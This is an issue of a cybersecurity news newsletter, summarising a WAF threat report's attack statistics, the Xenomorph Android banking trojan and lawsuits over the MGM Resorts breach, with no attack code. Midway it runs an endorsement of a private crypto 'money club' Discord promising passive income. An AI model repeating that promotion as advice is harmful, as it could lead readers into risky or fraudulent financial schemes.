Sep 27 2023
Welcome to Gone Phishing, your daily cybersecurity newsletter that laughs in the face of cybercrime ???? For now, anyway… ????
Today’s hottest cybersecurity news stories:
???? Network Effect Threat Report: NLX-tagged sites target tech ????
???? Xenomorph Banking Trojan targets more than 35 American banks ????
???? MGM Resorts faces class action lawsuit following cyberattacks ????
Welcome to our Network Effect Threat Report report (lol), your essential guide to fortifying your organisation's cybersecurity! ????️????
???? Maximising the Report's Value
???? Enhance your awareness of threat actor techniques. ????️????️
???? Identify potential attacks honing in on your industry. ????????
???? Gain invaluable insights to bolster and expedite your organisation's response to threats. ????
???? A closer look
The report is crafted from data within Fastly's Next-Gen WAF for the second quarter of 2023. Let’s dive into key insights that emerged from the research, covering global traffic across various sectors such as High Tech, Financial Services, Commerce, Education, and Media & Entertainment. ????????
1️⃣ Multi-faceted Attacks: 69% of IPs under NLX surveillance targeted multiple clients, with 64% casting a wide net across industries. ????????
2️⃣ Industry in Focus: The High Tech sector bore the brunt of attacks, accounting for 46% of NLX-tagged malicious traffic. ????????
3️⃣ Shifting Strategies: While SQL injection remains prevalent at 28%, Traversal techniques are gaining ground, constituting nearly one-third (32%) of the attacks analysed. ????????
4️⃣ Out-of-Band (OOB) Callbacks: Within NLX data, callback server domains are conspicuous, especially in Log4j JNDI lookups, OS command injection, and Cross-Site Scripting (XSS) attacks. 46% of requests employed recognized out-of-band application security testing (OAST) domains, e.g., interact.sh. ????????
5️⃣ Autonomous Systems (AS): Cloud Hosting providers emerge as the primary source of attack traffic, offering cost-effective computing resources and anonymity for large-scale attacks. ☁️????
???? Unveiling the Report's Essence
The Network Effect Threat Report draws its insights from NLX's verified malicious activity, offering a broader understanding of the overall threat landscape. ????????
???? Noteworthy Insights
During the Reporting Period, NLX tagged over half (54%) of all observed attacks. These attacks often targeted multiple customers and industries, showcasing the interconnected nature of modern threats. ????????
???? TL;DR?
Here’s three key points to take away from this report.
1️⃣ Multi-Target Menace: 69% of IPs targeted multiple clients and 64% aimed at various industries, revealing the broad scope of cyber threats. ????????
2️⃣ High Tech's Hotspot: High Tech took the brunt of attacks, accounting for a whopping 46% of malicious traffic, highlighting its vulnerability. ????????
3️⃣ Traversal Triumph: Traversal techniques surged to 32%, eclipsing SQL injection, suggesting attackers' evolving strategies. ????????
These insights provide a snapshot of the complex and ever-changing cybersecurity landscape. Stay vigilant, cyber squad! ????️????
I came across ZZZ money club during the crypto market bull run when everyone’s a winner, even during the bear market this discord group has been amazing at giving information on projects and ways to make passive income in various ways.
The group is very active and everyone in this private discord group is very chatty and helpful.
Its run by Yourfriendandy and Decadeinvestor, you can find them here on YouTube, both top guys with great content.
If you are interested in joining the group you can through the link below.
Dutch security firm ThreatFabric has detected an updated version of the Android banking trojan, Xenomorph, aimed at over 35 U.S. financial institutions. This campaign employs phishing web pages to lure victims into installing malicious Android apps that now target a wider range of apps than before. Spain, Canada, Italy, and Belgium are among other targeted countries.
???? Evolution of Xenomorph
Xenomorph, a variant of the Alien banking malware, first emerged in 2022. It evolved to bypass Android 13's security features and later gained the ability to conduct fraudulent transactions using the Automatic Transfer System (ATS). This system allows attackers to seize control of the device, transfer funds, and steal sensitive information via overlay attacks.
???? Advanced Features
Xenomorph now boasts an "antisleep" feature, screen activity simulation, and app impersonation. It targets popular Android devices, focusing on Samsung and Xiaomi, which together hold a significant market share.
???? Distribution Tactics
Unlike previous versions, this malware distributes apps through counterfeit websites offering fake Chrome browser updates. The investigation also revealed its use in distributing Windows stealer malware and a loader referred to as Private Loader.
⚠️ Stay Vigilant
Xenomorph remains a highly dangerous Android banking malware. To protect yourself, avoid downloading apps from untrusted sources and keep your device's security software up to date.
Stay safe and informed! ????️????
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
???? HealthHack: Tech is making it easier than ever to reach your fitness goals, from wearable devices to nutrition apps, this newsletter does the research for you, get all the latest health tech gadgets delivered to your inbox.
₿ Crypto Nutshell: A well written and beautifully designed newsletter giving you the lowdown on crypto and web3, highly recommend if interested to get up to date info on the crypto/web3 market.
???? Big Brain: Trending AI news, jobs and tools delivered in 3 minutes per day.
Let us know what you think!
MGM Resorts finds itself in legal hot water as it faces class action lawsuits filed in Nevada over a recent cyberattack. The lawsuits claim negligence and unjust enrichment, alleging that the company failed to safeguard its customers' data during a suspected social engineering attack. ????️????
???? Negligence Allegations
Plaintiffs argue that MGM should have been aware of the risks due to prior warnings from Okta, which had been repeatedly targeted for similar attacks. They claim MGM didn't take adequate steps to protect customer data. ????????
???? Operations Restored
While MGM Resorts has restored its hotel and casino operations after over 10 days of disruption, concerns linger. Guests are advised to monitor their MGM Rewards Mastercard accounts for potential fraud. ????????
???? Linked Threat Groups
Security researchers link Scattered Spider and AlphV/BlackCat threat groups to the attack. It's suspected that these groups may have collaborated, possibly using ransomware as a service infrastructure. ????????
???? Data Breach History
MGM Resorts has faced cyberattacks before, with a major breach in 2019. This latest incident is a stark reminder of the ongoing cybersecurity challenges in the casino industry. ????????️♂️
The situation remains under investigation by the FBI, with assistance from the Cybersecurity and Infrastructure Security Agency and Okta. The Federal Trade Commission has not commented on potential investigations at this time.
Stay tuned for updates on this high-stakes legal battle! ???????? That’s all for today, folks!
So long and thanks for reading all the phish!